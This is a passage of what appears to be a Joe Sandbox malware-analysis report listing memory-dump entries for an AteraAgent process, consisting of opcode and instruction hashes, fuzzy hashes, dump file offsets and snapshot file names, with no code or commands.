                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 052768c31e85b4b936177c4c543bf236457f75310bd2b494e96e0c62513f0d6d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A417D71D0964D8FEB54DBA8C8456FDBBE1FF55380F40417AE40ED7292CA385846CB80
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: {q
                                                                                                                                                                                                                                          • API String ID: 0-267941131
                                                                                                                                                                                                                                          • Opcode ID: bdcac716ab85763a8fef17faff9ce8815a6250f3ded06b071e0fed7786d62c01
                                                                                                                                                                                                                                          • Instruction ID: f590e5bf2e2f41cf6adf2de55db044f4f1e9c209e5790e681e4dcce56e8f4a3f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bdcac716ab85763a8fef17faff9ce8815a6250f3ded06b071e0fed7786d62c01
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F841282260EB8A4FF79AA73C589167237D5EF57380B4540FAD44EC72E3DC199C454390
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: X`O
                                                                                                                                                                                                                                          • API String ID: 0-1763170335
                                                                                                                                                                                                                                          • Opcode ID: 3d2dd1e7d7b2fa4b2e95ce1ed9383ebea6416098cd09ce7ae33dc2e908e3abd9
                                                                                                                                                                                                                                          • Instruction ID: d4ac491e40aef77c5dc3302528807309279de361191f86f1552e911c5422fdf7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d2dd1e7d7b2fa4b2e95ce1ed9383ebea6416098cd09ce7ae33dc2e908e3abd9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF311572B1DA4A8FE768DB5C985957937E5EF9E351F00417EE00EC32A3CE20AC0686C1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: tL_^
                                                                                                                                                                                                                                          • API String ID: 0-225026331
                                                                                                                                                                                                                                          • Opcode ID: d9d672aada3f85dcfe2089d84713ce2e31f13915ebe8dd3c7c7bd4350254057a
                                                                                                                                                                                                                                          • Instruction ID: d559994bc14154701eefcbc38f86cef7ddc01dde8894b471939257e4e9b3e39c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9d672aada3f85dcfe2089d84713ce2e31f13915ebe8dd3c7c7bd4350254057a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0631286390D2568BE701B77CE8854F93BE8DF42364F0845BBD04E8A1F3EE14649A8EC5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: GQ_H
                                                                                                                                                                                                                                          • API String ID: 0-266171174
                                                                                                                                                                                                                                          • Opcode ID: ddbfe51b4d45898153121b92e1bd2759521ff3239c69667d2b836e55b61d9fb1
                                                                                                                                                                                                                                          • Instruction ID: c8fb9a04bfb93de051e88e74a019f174a216d8bbe21b2f32d64fa25be1ea8e4e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ddbfe51b4d45898153121b92e1bd2759521ff3239c69667d2b836e55b61d9fb1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E331D37050E78A8FD766973488589657FE5EF57240B0980FBD08ECB1E3DD196C0AC3A1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0pO
                                                                                                                                                                                                                                          • API String ID: 0-2342757507
                                                                                                                                                                                                                                          • Opcode ID: 9d6c5c2db05190978bfaa1341a92d7b9c871d4236c50ecc901eb559b9379b94e
                                                                                                                                                                                                                                          • Instruction ID: 5ad3c0a893d8d9eae1aa9b34485eb940aad7e9f1a9df914b423ae8dec5838a3d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d6c5c2db05190978bfaa1341a92d7b9c871d4236c50ecc901eb559b9379b94e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94213A3270990A8FDB94DB1CE4107B577D5EF89390F4841BAE44EC73A2CE1A9C4683C1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c46f8049fece432143bb119f3f85de94b56786a2bc8a202ec234a288c966fcca
                                                                                                                                                                                                                                          • Instruction ID: 4b2d754f4a7fd13180f4a9573e5e5a347e83623735d59819f0fc6e1e705cc7d7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c46f8049fece432143bb119f3f85de94b56786a2bc8a202ec234a288c966fcca
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BB1786160DB868FE765EB28C4959A87BE0EF56240B0841FBC44ECB1A3DD25A80DC7D1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: caf0bffad2b5d5dc0c80a1c8c60792cac192ceb9e26371316957f8e3ff891949
                                                                                                                                                                                                                                          • Instruction ID: f1acade95628229a5560f78dcd4841d799e1fd6fbfc9513be377c163eafc1794
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: caf0bffad2b5d5dc0c80a1c8c60792cac192ceb9e26371316957f8e3ff891949
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23918171918A8E8FDB84EF68C854BEAB7F1FF59340F104275D40DD72A6DA34A846CB80
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a7c10b0db9addcfdfca9e334a41fb5c9d75b41f40a08b5cd7c78a29b56e409bd
                                                                                                                                                                                                                                          • Instruction ID: 89c19f0d67f839ad6cf7ba4e866846d333cfde4b0aa91de512ecbd5c59a503d0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7c10b0db9addcfdfca9e334a41fb5c9d75b41f40a08b5cd7c78a29b56e409bd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F613A62A2DACA8FEB95DB6C88652B93BE5EF96350F0840BFD04DD7293CD145C0683C1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6d4d79c75724d3e4a2ab21b84944f92dbb8d904d20fb2f74fe462da0b8680a0c
                                                                                                                                                                                                                                          • Instruction ID: b02588b977f1057263c20e38f6d0b133bdd534b39f45306db3570957df024f51
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d4d79c75724d3e4a2ab21b84944f92dbb8d904d20fb2f74fe462da0b8680a0c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C811B70A1994ECFDF94EF18C884AE977E5FF69354F054276E40EE3296CA34E8458B80
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f790aa17383ec95ce1ac69ae0215b3f7874f2f9bcf4a0909929da3ab2bd61859
                                                                                                                                                                                                                                          • Instruction ID: 7d4bb5864ec63bc45c67442ad92acf55d81b94cebd7ac508a0628ec974c1b6e0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f790aa17383ec95ce1ac69ae0215b3f7874f2f9bcf4a0909929da3ab2bd61859
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8061BC31A0DA0B4FE7689B2CD8565B577D5EF96350B0441BED44FC3197DD16AC4A83C0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7f28cc65947d4d06a6d5d0ff36866f6ff23539d790c4de7cbff77d614e9718e2
                                                                                                                                                                                                                                          • Instruction ID: f55f387a82a33750c84345487cf1a545bf65e47cf7882d27e9dd3e7622f68b8d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f28cc65947d4d06a6d5d0ff36866f6ff23539d790c4de7cbff77d614e9718e2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24512A6290DA8A8FE7999BAC98465B977E1EF46390F0040BAD00EC71E7DD285C468BD1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 306a9b6fbafe4dd4eee8520ec6304aa14eb32c121843afaee8769edad9a0d33c
                                                                                                                                                                                                                                          • Instruction ID: d437aac74a7ebc4b2197db14a8940acdd6f2e0fba45112c5c4e3d6d18a02a63a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 306a9b6fbafe4dd4eee8520ec6304aa14eb32c121843afaee8769edad9a0d33c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F071C07090964D8FDB89DFA8C854BED7BF1FF5A340F0041AAD00ED72A2CA399945CB50
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b7a4439f2a3393f7356194f277644f1b67e26f0dcd117d0e4425d51e82c2a8c7
                                                                                                                                                                                                                                          • Instruction ID: 0a20f98fa3e0c7638ec6d19048aab470b8a79f23a02d560a4586e4ca2892e8d8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7a4439f2a3393f7356194f277644f1b67e26f0dcd117d0e4425d51e82c2a8c7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D815C70C0961E8EEB58DB68C8557FDB6B4FF55340F5041BAD00EE3292DE386985DB50
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9806866b019121677e29cab65351557164434efc80303830937e3dd7043277e9
                                                                                                                                                                                                                                          • Instruction ID: 0fe1c537b571dc0a1187b29c3f64aca1821c4d72e870c9f4de846c91c37a8ce0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9806866b019121677e29cab65351557164434efc80303830937e3dd7043277e9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73712D70914A8E8FDB84EF68C895AEDB7F1FF59300F504275D40DD7296DA34A846CB80
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15ba4963e75f15d88e2e60eeeba2dd36c824eb22cf08181bc7458d9dac0d690c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B513A72A0E7CA8FE755975C9C515B03BE4EF53260F0941BAD08EC71E3ED19E80A8791
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6e792dce571208c0781ed055de58c55b71b3a9fa5a9f2b1feaf611cf126a747e
                                                                                                                                                                                                                                          • Instruction ID: b6a7f974ca2856c018f2fde0bd114563fc3c270dbff58be9cac8b18164ccf90c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e792dce571208c0781ed055de58c55b71b3a9fa5a9f2b1feaf611cf126a747e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A41C861A1DD4B8FF6B9D76C945467926D5EF99380F0881BAD04FC72E3CD19AC0A83C1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e01b0867ac5829992699e2e78954ccefaa88c3b9085d9c66fa99ec758d194b96
                                                                                                                                                                                                                                          • Instruction ID: 7df076b9eb4709749c86119cd755ea05caa01055d371edf2034c827629ffa753
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e01b0867ac5829992699e2e78954ccefaa88c3b9085d9c66fa99ec758d194b96
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9741392070DA4A4FE799DB2CD819BB677D5EF9A350B4441FEE04EC32A3DD19AC458380
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 23c2845ac16ff1f1763241354049935924c46103c7260d0ee3ee6932236a99b6
                                                                                                                                                                                                                                          • Instruction ID: fe47a968530aae4919411d7e2eaf55a226a07da7f09b358fa92ee1aec65ab5a8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23c2845ac16ff1f1763241354049935924c46103c7260d0ee3ee6932236a99b6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D51F570A09A1DCFDF98EF68D455AEDBBB1EF59341F10016AD40DE3292DA34A845CB80
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d2988ee202a1c9c40013f6e765572571b697dc7394d3c699f80dfa21559d3a8d
                                                                                                                                                                                                                                          • Instruction ID: 997c56b1e3b3a28c70454d3cc267a94a18a524e22b8b5d970945cc6d49ed039b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2988ee202a1c9c40013f6e765572571b697dc7394d3c699f80dfa21559d3a8d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D51C7A260E6C68FE392D72C889D6A57BD5DF57250F0845FED08ECB1B3D925680AC381
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3876d2f8b5064d714477135a88b79f8b2a2eef605bf79ac26a3fc8129c85467a
                                                                                                                                                                                                                                          • Instruction ID: f013958f9d149e326d872f6c55250eff77d3075b88809ebe5bbe0c7e6dc166cb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3876d2f8b5064d714477135a88b79f8b2a2eef605bf79ac26a3fc8129c85467a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD412770A09A1DCFDF94EF68D855AEDBBB1EF59341F10417AD00DE32A2DA35A845CB80
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0f41cb01faabfad56b9817a6c7fbb74c6e89887a3f0ec2390f53a88dcb87bf93
                                                                                                                                                                                                                                          • Instruction ID: 358c309bc4a6da94957cfc44a5108ea6b95833966d28d908c34dcff6cd73fdb8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f41cb01faabfad56b9817a6c7fbb74c6e89887a3f0ec2390f53a88dcb87bf93
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8141A471D09A4D9FDB81DF68C441AFEBBF1FF5A340F4441A6E00CD7292DA3899458B90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 69b8c8e51eb97a421608e7f45ac9f6c878b0ae30843cefd953a2c4fb31b3cd6a
                                                                                                                                                                                                                                          • Instruction ID: 33f87b6090d7d8cc64c0a797389906a8251fd841612eec5bcf793f178bd9c40f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69b8c8e51eb97a421608e7f45ac9f6c878b0ae30843cefd953a2c4fb31b3cd6a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B417030619B468FDFA5EB3CC050E6277D5EF96340B5485A9D04FC76A3C925F849CB90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3fd1c4dfeb408111d20fd33c116d2b6fdbb5d7646866603ee18a29185dfe00a4
                                                                                                                                                                                                                                          • Instruction ID: fde02ac30c4a879244a2adb576fa35179ca24935cbccb65fb624edddd86bd1fb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fd1c4dfeb408111d20fd33c116d2b6fdbb5d7646866603ee18a29185dfe00a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF41777250CB858FD740F768EC62AAAB7D4FFA6350F04457BD04AC3192EA15A84D87C2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f962ef2639d118c510a42b3c54b636c135bcfbaa610d862352ee8f871e7ebc9b
                                                                                                                                                                                                                                          • Instruction ID: 4cfa051ba3d560388581a9a13b25a2dd183b0a7c24bfdd6a0eb712aa80084868
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f962ef2639d118c510a42b3c54b636c135bcfbaa610d862352ee8f871e7ebc9b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3417F31A08A0A8FDB98DF58D4556BA37D1FFA9350F10457EE40ED32A6CE26A84687C1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8487b8adfa7bfc8c14dc552ffcf6e6dc162b1592a1c1e1dc410b7b5d9d55a1a9
                                                                                                                                                                                                                                          • Instruction ID: 1eac8d4596d95f1e26099297b2f7156fca8870552024cf71c1e54fe861fc05d5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8487b8adfa7bfc8c14dc552ffcf6e6dc162b1592a1c1e1dc410b7b5d9d55a1a9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09417F7190A60ACFDB94DFA8E4516FDB7B5FF4A350F50447AD00ED32A2CE7998458B80
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
